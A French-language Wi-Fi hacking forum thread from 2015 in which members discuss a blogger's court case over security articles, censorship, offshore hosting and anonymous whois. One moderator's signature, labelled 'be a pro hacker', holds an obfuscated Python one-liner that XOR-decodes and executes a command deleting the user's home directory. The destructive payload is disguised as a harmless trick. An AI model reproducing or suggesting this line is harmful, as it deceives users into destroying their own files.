Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-05-2015 21:31:51

spawn
Modérateur

L'Affaire Krach.in

Notre ami http://krach.in a été attaqué en justice et a perdu pour 3 petits articles, dont un non explicite sur les vulnérabilités du Wi-Fi.
Comme il le dit sur sa page d'accueil, il va donner plus de détails sur son affaire.
C'est bien triste neutral

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-05-2015 22:44:13

Furyo
Membre Irremplaçable
Site Web

Re : L'Affaire Krach.in

Oui, très tristre même..

S'attaquer aux petits c'est facile..

L'erreur c'est de reconnaître être coupable mais à sa lecture je comprends ses raisons..

Il aurrait un peu de temps, un avocat qui a des couilles, il aurrait gagné sans aucuns problèmes!

Le soucis, c'est qu'ils vont continuer maintenant ce genre d'action judiciaire!

Vive l'hebergement à l'etranger !!

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#3 10-05-2015 11:56:03

Fab955
Membre Irremplaçable

Ce serait pas plutôt à cause des mots "hash" ; "crack" qui aurait titillé notre cher gouvernenment?
En fait ils ont rien compris (enfin font comme-ci) bah oui tout est bon pour remplir les caisses de l'état.

Par contre c'est bizarre que l'on ne condamne pas les magasins de bricolage avec tout les cambriolage qui ont lieu car ce sont eux qui fournissent le matériel au grand public..

Un exemple qui représente une goutte d'eau dans un océan de la connerie humaine...

Désespérant cette histoire..

#4 12-05-2015 20:20:02

M1ck3y
Administrateur
Lieu : Lost in the darkness

C'est vraiment étrange.

"ils sont obligé de traiter cette plainte car elle vient d'une sorte de bot qui scanne le WEB FR et selon les contenus lève des infractions". WTF? Mais c'est quoi ce tissu de conneries?
Une plainte qui vient d'un bot? C'est quoi ce délire?
Depuis quand un site avec un tld en .in fait il partie du web FR? C'est juste nawak!

Un autre truc vraiment chelou: le whois est anonyme, et l'hébergeur aux pays bas. Le tld est en .in, il s'agit donc du top level domain indien. On peut penser que le site cible les indiens francophones. En quoi la justice française est elle concernée, et en quoi a t elle son mot à dire? Et d'ou ils sortent son nom?

Vraiment, tout cela n'est pas très clair.

#5 13-05-2015 06:24:10

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

Ils sortent son nom parce qu'il à pris son nom de domaine à son nom tout simplement, et le whois n'est pas anonyme malheureusement, même si l'option est activé, certain services de whois révèlent pourtant mon vrais nom...

1310812721.gif

#6 13-05-2015 20:06:02

M1ck3y
Administrateur

Si ton nom sort publiquement c'est que tu n'as pas un service de whois anonyme. Dans ton cas, le registrar OVH ne propose pas de whois anonyme, mais un service d'obfuscateur. Concrètement, cela signifie que tu peux utiliser OwO pour masquer différents éléments comme ton email, ton adresse et ton numéro de téléphone, mais ton nom et ton prénom restent visibles, contrairement à un véritable service de whois anonyme. Si tu veux l'anonymat, il te suffit de transférer le domaine vers un autre registrar. Par les temps qui courent ça serait peut etre une bonne chose pour toi d'ailleurs.

Dans le cas de krach.in, il y a bien un véritable service de whois anonyme:

whois a écrit :

Registrant Name:Laura Yun
Registrant Organization:Offshore Hosting Ltd
Registrant Street1:Oliaji TradeCenter 1st floor
Registrant Street2:
Registrant Street3:
Registrant City:Victoria
Registrant State/Province:Mahe
Registrant Postal Code:3326
Registrant Country:AF
Registrant Phone:+248.2234234
Registrant Phone Ext.:
Registrant FAX:+248.2234234
Registrant FAX Ext.:
Registrant Email:[email protected]

Dons à moins qu'il ne s'appelle Laura Yun et qu'il ne vive en afghanistan, c'est bien du whois anonyme... C'est ça qui est très bizarre.

#7 13-05-2015 20:26:40

Krach
N00b

Salut à vous smile
Je me suis inscris car je pense qu'il vous manque quelques réponses wink

Concernant le whois, il était à mon nom et le serveur était en France et à mon nom également.
J'ai tous migré histoire de changer d'air.

Et pour ce qui est d'aller au pénal, y a forcément le prix mais il ne faut pas non plus oublier les jours de congés à prendre pour tel ou tel démarche administrative (ce qui m'a fait renoncer à l'aide juridictionnel par exemple) ou bien pour se rendre aux RDV avec l'avocat, le passage au tribunal, ...

J'ajoute le fofo dans mes fav (bien que je le connaisse de longue date wink ) histoire de pouvoir vous répondre smile

#8 13-05-2015 20:55:04

M1ck3y
Administrateur

Hello smile

J'hésitais à te contacter par rapport à ça, pour ne pas t'embéter vu tout le buzz en ce moment, et puis te voila smile

Moi aussi on m'a poussé à aller me faire héberger à l'étranger (je t'invite à lire, ça va te rappeler quelque chose) il y a quelques temps déja, je compatis. Malheureusement, tout ce qui est web fr craint:

-hébergeur en France= ça craint
-nom de domaine en .fr = ça craint
-whois public = ça craint

Et c'est de pire en pire meme si le discours des hébergeurs français se veut rassurant: Le point de vue d’OVH.com sur la loi renseignement. C'est ni plus ni moins qu'un Patriot Act à française, et on peut dores et déja parier que les abus seront très nombreux, puisque sous couvert de suspiscion de terrorisme ils pourront faire passer ce qu'ils veulent: lui, on l'a surveillé parce qu'il avait fait un streetview sur une ville en Tunisie, donc on s'est dit qu'il préparait un voyage en Lybie. Celui là, il s'intéresse à la sécurité informatique d'un peu trop près, et il a acheté un billet de train, il prépare surement une attaque. Et lui, et bien il a commandé un jean et un PC portable, la semaine dernière sur un site marchand, le gars avec un jean et un PC portable c'est le profil type du cyber terroriste, on était obligé de le mettre sous surveillance...

Bon enfin on est très heureux de t'accueillir, parce que vu le contenu du forum c'est visiblement une thématique qui t'intéresse pas mal big_smile

Il faut voir le coté positif: tu as appris qu'en France le web n'est plus libre, donc tu ne feras plus la meme connerie 2 fois, et tu as pu faire connaitre un peu ton blog, et maintenant tu peux y faire passer ton message.

Donc que les choses soient claires, ici c'est une communauté pour les personnes francophones vivant en Ukraine, on n'a rien à voir avec le web FR wink

#9 14-05-2015 07:07:11

Krach
N00b

Je viens de lire ce qui est arrivé à ce forum, c'est l'hébergeur qui vous à viré?
C'est exactement le même type de jugement dont j'ai été la cible, en gros de l'incitation au piratage... Qu'est-ce qu'il ne faut pas entendre.
C'est ceux qui pensent ça qu'il faudrait poursuivre, ils ont les idées mal placées, il voit uniquement le but de la réutilisation à des fins malveillantes.
C'est comme condamner le supermarché du coin car il vend des couteaux.

Mon ressentiment par rapport à ces censures c'est que j'ai l'impression que si tu ne payes pas une école des milles et des cents pour devenir 'expert' en infosec, t'as pas le droit d'avoir accès à ces connaissances, on aurait pas le droit d'être autodidacte?
Et le savoir est fait pour être partagé, sinon comment évolueront nous? Lentement voir à reculons!

Je pense que le métier de pentester est encore inconnu à leurs yeux.

#10 14-05-2015 10:44:34

M1ck3y
Administrateur

Oui c'est ça, en fait on avait été purement et simplement censurés sans aucune forme de procès, parce qu'on traitait de sécurité informatique. Plutot que de me battre contre l'hébergeur et risquer de subir encore la meme chose voir pire par la suite, on a déménagé. Ca fait environ 5 ans que le web FR est synonyme de censure pour nous. Effectivement, c'est une forme d'obscurantisme numérique. Les "moutons" n'ont pas à savoir comment fonctionnent les systèmes, et s'ils sont sécurisés ou non. Ils doivent utiliser les systèmes sans chercher à comprendre, ils doivent payer et surtout ils doivent la fermer.

On en avait déja parlé sur le forum, en France si tu n'es pas diplomé tu n'es pas considéré, c'est comme ça, alors qu'aux Etats unis par exemple, ils sont prets à embaucher des geeks ou ex hackers, des autodidactes qui n'ont jamais fait d'études, en se basant simplement sur leurs compétences réelles. C'est un problème culturel en fait mais peut etre que ça finira par évoluer.

C'est assez flippant, d'autant que le site officiel Aircrack-ng est encore hébergé en France et que son auteur n'a jamais caché son nom. Il vit et travaille aux States maintenant, mais si ça continue comme ça il devra déménager le site lui aussi.

A ma connaissance, les autorités n'ont pas de bot qui crawle le "web FR" pour aller analyser les pages et débusquer des sites illégaux d'après certains mots clés, c'est de la foutaise. Et meme si un tel procédé devait exister, il serait voué à lutter contre le terrorisme ou la pédophilie, pas à chercher le keyword "Aircrack". Il faut etre réaliste, je pense plutot que tu as du etre balancé auprès d'une plate forme de signalement, et si le whois était public ils n'ont eu aucun mal à te retrouver.

Enfin, je vois que tu n'as pas abandonné ta passion pour le web, et que tu préfères maintenant t'adresser à nos amis francophones du montenegro, c'est cool il ne faut rien lacher!

M1ck3y a écrit :

Chassez nous par la porte, on reviendra par la fenetre

wink

#11 14-05-2015 12:24:00

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

M1ck3y a écrit :

Si tu veux l'anonymat, il te suffit de transférer le domaine vers un autre registrar. Par les temps qui courent ça serait peut etre une bonne chose pour toi d'ailleurs.

Heureusement et malheureusement je ne suis pas français, donc déjà les loi française j'en ai un peu rien à foutre, et si il m'attaque, moi j'ai un très bon avocat, c'est pas trop un souci, par contre pour ce qui est de changer de registrar, c'est le seul qui accepte que je n'ai pas de carte de crédit (mais ça va changer donc mon site va disparaître à la fin de mon abonnement), et que je puisse payer par versement bancaire sans me coûter un bras.

je n'ai pas de carte de crédit et je n'en veux pas, et les autre il faut soit habiter dans le pays soit envoyer une copie de sa carte d'identité soit ils coûtent un bras etc etc..

j'ai voulu hébergé moi même mais ici on est limité en upload à 512k donc là aussi c'est mort

1310812721.gif

#12 14-05-2015 14:23:40

M1ck3y
Administrateur

Le problème c'est qu'ils pourraient vouloir censurer ton site aussi. Sinon pour payer ton ndd tu as aussi des méthodes alternatives: namecheap paiement BTC par exemple. Au pire, contacte moi en MP si tu as besoin plutot que de laisser disparaitre ton ndd ett ton site, on s'arrangera.

Annonce